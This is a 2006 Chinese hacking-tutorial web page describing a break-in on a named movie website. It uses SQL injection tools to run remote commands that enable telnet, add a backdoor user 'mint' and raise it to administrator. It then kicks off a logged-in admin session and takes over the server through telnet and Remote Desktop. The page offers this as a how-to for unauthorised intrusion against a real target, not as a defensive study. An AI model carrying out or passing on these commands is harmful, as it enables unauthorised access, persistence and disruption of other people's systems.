| 利用注入漏洞获得密码 |
|
作者:八千尺 文章来源:本站原创 点击数: 更新时间:2006-2-7  |
| [ 字体:缩小 正常 放大 | 双击自动滚屏 ] |
请选择合适的字体颜色:
|
|
操作过程
1,查找一个电影网站。
http://www.22see.com/
2,利用ascscan查找网页可以利用的注入点。
3,使用NB2注入工具进行注入
4,使用ping命令得到www.22see.com的ip地址
5,使用端口扫描器扫描ip开放的端口。发现开放
3389,对方管理员看来安全意识很差。使用终端服务却不修改默认3389端口。
6,使用nb2的sql工具。远程执行dos命令
net start telnet 开telnet服务
net user mint mint /add 添加用户mint密码为mint
net localgroup administrators mint /add 将帐号mint升级为管理员
7,使用3389登陆。发现登陆用户已满。不用怕。我们把他踢出去。
8,telnet对方ip。发现需要NTLM 身份验证。怎么办?放弃不是黑客的追求。
9,我们在自己的电脑里建立一个帐号mint密码为mint身份为管理员。
10,找到c:\winnt\system32\cmd.exe 建立一个快捷方式到桌面。
11,修改cmd的快捷方式属性为允许其他身份登陆。
12,然后运行桌面上的cmd.exe的快捷方式。输入帐号mint密码mint
13,telnet对方ip.直接可以登陆对方电脑了。
使用命令
c:\query user 查看对方目前终端登陆状况。
运行命令
c:\logoff 1 踢出去一个管理者
再用c:\query user检查一便~~
ok了
14,使用3389远程终端登陆。
|
|
| 文章录入:ppxb6648 责任编辑:54iter |
上一篇文章: 透视Win95的密码档
下一篇文章: 用C语言轻松编写QQ挂机王 |
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
